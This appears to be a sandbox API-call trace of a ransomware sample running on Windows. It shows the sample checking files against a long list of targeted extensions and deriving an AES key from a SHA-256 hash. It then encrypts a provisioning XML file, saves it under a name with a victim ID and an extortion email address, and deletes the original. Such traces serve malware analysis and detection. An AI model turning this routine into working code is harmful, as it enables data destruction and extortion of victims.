	[0173.777] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.777] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.778] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.778] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.781] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x1cac, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x1cac, lpOverlapped=0x0) returned 1
	[0173.786] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.786] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb880) returned 1
	[0173.788] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.788] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0173.788] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.788] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0173.788] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.789] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9070) returned 1
	[0173.789] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.789] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x1cac, dwBufLen=0x1cac | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x1cb0) returned 1
	[0173.789] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.790] RtlMoveMemory (in: Destination=0xfdfe40, Source=0xfde188, Length=0x1cac | out: Destination=0xfdfe40) 
	[0173.790] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.790] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdfe40*, pdwDataLen=0x18a1ec*=0x1cac, dwBufLen=0x1cb0 | out: pbData=0xfdfe40*, pdwDataLen=0x18a1ec*=0x1cb0) returned 1
	[0173.790] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.791] CryptDestroyKey (hKey=0xfb9070) returned 1
	[0173.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.791] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0173.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.791] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0173.791] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.791] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.792] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.792] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0173.793] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0173.793] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.795] WriteFile (in: hFile=0x39c, lpBuffer=0xfdfe40*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdfe40*, lpNumberOfBytesWritten=0x18a648*=0x1cb0, lpOverlapped=0x0) returned 1
	[0173.798] CloseHandle (hObject=0x39c) returned 1
	[0173.800] CloseHandle (hObject=0x390) returned 1
	[0173.800] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml")) returned 1
	[0173.804] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml")) returned 0
	[0173.804] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a2656d, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a2656d, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0173.804] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0173.804] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0173.804] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\"
	[0173.804] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml"
	[0173.804] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml") returned 100
	[0173.804] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.805] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml") returned 0x64
	[0173.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.805] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.805] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"
	[0173.805] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml") returned 100
	[0173.805] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.806] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.806] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.806] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.807] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.807] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.807] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0173.818] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.818] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb7f8) returned 1
	[0173.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.820] CryptCreateHash (in: hProv=0xfcb7f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0173.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.820] CryptHashData (hHash=0xfb95b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0173.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
